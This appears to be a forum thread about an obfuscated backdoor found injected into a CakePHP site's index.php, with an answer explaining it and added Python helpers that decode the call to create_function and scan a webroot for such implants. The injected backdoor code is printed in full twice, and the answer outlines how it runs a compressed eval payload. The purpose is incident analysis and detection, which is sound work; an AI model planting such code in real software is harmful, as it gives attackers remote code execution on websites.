I was contacted regarding some strange error messages on a CakePHP website the other day. We were seeing errors like the following:
```text
Expectation Failed:
The expectation given in the Expect request-header field could not be met by this server.
Expect: 100-continue, 100-continue
Only the 100-continue expectation is supported.
```
I ended up tracking down the random code in our index.php file:
```php
$get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!` mh(!3,da7*& H& (a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'| '!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:';
$wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';
$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);
$set_yly_timeout();
```
It looks like some sort of scrambled / encrypted code, so I'm suspicious. But I don't know how to go about descrambling it. Anyone have any ideas about what this code was trying to do?
Edit: Here's the entire index.php file. Note: the hack code is back as of this morning :-/ I have been checking around on the server, but don't see how the code got put in (and the modified date on the file remains unchanged since I edited it yesterday).
```php
<?php
/**
 * Copyright 2005-2007, Cake Software Foundation, Inc.
 * 1785 E. Sahara Avenue, Suite 490-204
 * Las Vegas, Nevada 89104
 *
 * Licensed under The MIT License
 * Redistributions of files must retain the above copyright notice.
 *
 * @filesource
 * @copyright    Copyright 2005-2007, Cake Software Foundation, Inc.
 * @link         http://www.cakefoundation.org/projects/info/cakephp CakePHP(tm) Project
 * @package      cake
 * @subpackage   cake.app.webroot
 * @since        CakePHP(tm) v 0.2.9
 * @version      $Revision: 4450 $
 * @modifiedby   $LastChangedBy: phpnut $
 * @lastmodified $Date: 2007-02-04 23:18:05 -0600 (Sun, 04 Feb 2007) $
 * @license      http://www.opensource.org/licenses/mit-license.php The MIT License
 */
/**
 * Do not change
 */
if (!defined('DS')) {
    define('DS', DIRECTORY_SEPARATOR);
}
/**
 * These defines should only be edited if you have cake installed in
 * a directory layout other than the way it is distributed.
 * Each define has a commented line of code that explains what you would change.
 *
 */
$get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!` mh(!3,da7*& H&(a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'| '!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:';
$wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';
$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);
$set_yly_timeout();
if (!defined('ROOT')) {
    //define('ROOT', 'FULL PATH TO DIRECTORY WHERE APP DIRECTORY IS LOCATED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
    //You should also use the DS define to seperate your directories
    define('ROOT', dirname(dirname(dirname(__FILE__))));
}
if (!defined('APP_DIR')) {
    //define('APP_DIR', 'DIRECTORY NAME OF APPLICATION';
    define('APP_DIR', basename(dirname(dirname(__FILE__))));
}
/**
 * This only needs to be changed if the cake installed libs are located
 * outside of the distributed directory structure.
 */
if (!defined('CAKE_CORE_INCLUDE_PATH')) {
    //define ('CAKE_CORE_INCLUDE_PATH', FULL PATH TO DIRECTORY WHERE CAKE CORE IS INSTALLED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
    //You should also use the DS define to seperate your directories
    define('CAKE_CORE_INCLUDE_PATH', ROOT);
}
///////////////////////////////
//DO NOT EDIT BELOW THIS LINE//
///////////////////////////////
if (!defined('WEBROOT_DIR')) {
    define('WEBROOT_DIR', basename(dirname(__FILE__)));
}
if (!defined('WWW_ROOT')) {
    define('WWW_ROOT', dirname(__FILE__) . DS);
}
if (!defined('CORE_PATH')) {
    if (function_exists('ini_set')) {
        ini_set('include_path', CAKE_CORE_INCLUDE_PATH . PATH_SEPARATOR . ROOT . DS . APP_DIR . DS . PATH_SEPARATOR . ini_get('include_path'));
        define('APP_PATH', null);
        define('CORE_PATH', null);
    } else {
        define('APP_PATH', ROOT . DS . APP_DIR . DS);
        define('CORE_PATH', CAKE_CORE_INCLUDE_PATH . DS);
    }
}
require CORE_PATH . 'cake' . DS . 'bootstrap.php';
if (isset($_GET['url']) && $_GET['url'] === 'favicon.ico') {
} else {
    $Dispatcher = new Dispatcher();
    $Dispatcher->dispatch($url);
}
if (Configure::read() > 0) {
    echo "";
}
?>
```
I'm starting to wonder if I need to update Cake, as it's currently v1.1 :-/
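As an added analysis aid (not code from the question or its answers), the following Python helper reproduces the two PHP string operators the implanted line relies on, `^` and `|`, which PHP applies byte by byte to string operands. Running `^` over the two short literals that build `$wp_cw_kses_split` recovers the function name the snippet calls. The list of code-execution primitives it checks against is an assumption of this example, chosen for triage.

```python
"""Added analysis helper: apply PHP's byte-wise string operators to the literals in the post."""

# PHP functions that turn data into executed code. A decoded name landing in this
# set (an assumed triage list, not something from the post) means the file should be
# treated as a backdoor rather than as broken code.
CODE_EXECUTION_PRIMITIVES = {
    "create_function", "eval", "assert", "preg_replace",
    "call_user_func", "call_user_func_array", "system", "exec", "shell_exec", "passthru",
}

# The two literals that the posted line combines with '^' to produce $wp_cw_kses_split.
LEFT = b">=^/E]u*PDAF$!V"
RIGHT = b']O;N18*L%*"2MN8'


def php_str_xor(a, b):
    """PHP's '^' on two strings: byte-wise XOR, result as long as the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def php_str_or(a, b):
    """PHP's '|' on two strings: byte-wise OR, the longer operand's tail is kept as-is."""
    longer, shorter = (a, b) if len(a) >= len(b) else (b, a)
    out = bytearray(longer)
    for i, y in enumerate(shorter):
        out[i] |= y
    return bytes(out)


def resolve_callable_name():
    """Decode the function name the snippet calls through $wp_cw_kses_split."""
    return php_str_xor(LEFT, RIGHT).decode("ascii")


def is_code_execution_primitive(name):
    """True when the decoded name is one of the primitives worth escalating on."""
    return name in CODE_EXECUTION_PRIMITIVES


if __name__ == "__main__":
    name = resolve_callable_name()
    print(name, "(code execution primitive)" if is_code_execution_primitive(name) else "")
```

The decoded name is `create_function`, which explains the last two statements: `$wp_cw_kses_split('', $get_ya_weekday_initial)` compiles an anonymous function whose body is the `|`-decoded long string, and `$set_yly_timeout()` runs it on every request. The long pair is not decoded here because the copy on this page has had its spacing altered in extraction (the two copies above already differ), so its bytes no longer line up.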
The code in a more readable form is:
It's sort of a backdoor script that has been obfuscated (if you want to know how, see the related question). It's resting in the code until a payload is provided.
The payload needs to be placed into
in form of DEFLATE data (RFC 1951) of PHP code (without the opening `<?php` tag), see gzinflate Docs and eval Docs.

Make your changes to the file again. Then make the file read-only (as any of your php files should be on the server). When it is read-only, check if it's still clean. Also ensure that the process reading the file in a standard web-request is not able to change file-permissions on the file, e.g. only allow root to do that.
Then log file access to the files on your site to find out when a file gets changed (or a process attempts to change a file).
As commented yesterday, you should contact the person responsible for the server. You already did that, right? You need to have someone who can look into the issue with you and who can talk with you about it.
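The answer recommends re-checking the file after locking it down and watching for changes, and the question notes that the modification date did not move when the code came back. As an added example, not part of either post, here is a Python script that takes a SHA-256 baseline of a webroot, reports content changes that a timestamp check would miss, and scans each PHP file for the constructs seen above (string literals joined with `^` or `|`, `create_function`, `gzinflate`, `eval`, and a variable called as a function with an empty first argument). The directory layout, the stand-in front controller and the implanted line are constructed for the demo; the pattern list is this example's own choice.

```python
import hashlib
import os
import re
import tempfile

# Constructed stand-in for a clean front controller (not the real CakePHP index.php).
CLEAN_INDEX = (
    "<?php\n"
    "require 'cake/bootstrap.php';\n"
    "$Dispatcher = new Dispatcher();\n"
    "$Dispatcher->dispatch($url);\n"
    "?>\n"
)
# Constructed stand-in for an implanted line with the same shape as the one in the post:
# two string literals joined with '|', a name built with '^', and a variable used as a
# function with an empty first argument. The literals here are meaningless filler.
IMPLANT = "$a = 'ab' | 'cd'; $f = 'xy' ^ 'zw'; $g = $f('', $a); $g();\n"

# Constructs worth flagging in a front controller; every hit deserves a human look.
SUSPICIOUS = {
    "string_bitwise_literal": re.compile(r"'[^']*'\s*[\^|]\s*'[^']*'"),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "gzinflate": re.compile(r"\bgzinflate\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "variable_function_call": re.compile(r"\$\w+\s*\(\s*''\s*,"),
}


def hash_tree(root):
    """Return {relative path: sha256 hex} for every .php file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return manifest


def diff_manifests(baseline, current):
    """Compare two manifests by content hash; timestamps play no part."""
    both = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in both if baseline[p] != current[p]),
    }


def scan_file(path):
    """Return the labels of suspicious constructs found in one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(label for label, rx in SUSPICIOUS.items() if rx.search(text))


def demo():
    """Baseline a constructed webroot, implant a line, reset the mtime, and re-check."""
    with tempfile.TemporaryDirectory() as root:
        index = os.path.join(root, "app", "webroot", "index.php")
        os.makedirs(os.path.dirname(index))
        with open(index, "w") as fh:
            fh.write(CLEAN_INDEX)
        baseline = hash_tree(root)
        before = os.stat(index)

        # Reproduce the situation from the question: the content changes but the
        # modification time is put back, so a check based on mtime sees nothing.
        with open(index, "w") as fh:
            fh.write(CLEAN_INDEX.replace("require", IMPLANT + "require", 1))
        os.utime(index, ns=(before.st_atime_ns, before.st_mtime_ns))

        return {
            "mtime_unchanged": os.stat(index).st_mtime_ns == before.st_mtime_ns,
            "changes": diff_manifests(baseline, hash_tree(root)),
            "findings": scan_file(index),
        }


if __name__ == "__main__":
    print(demo())
```

In practice the baseline manifest is written once after the file is restored and made read-only, stored off the web server, and compared on a schedule; a hash mismatch or a scanner hit on the front controller is the trigger to pull the access logs for that window.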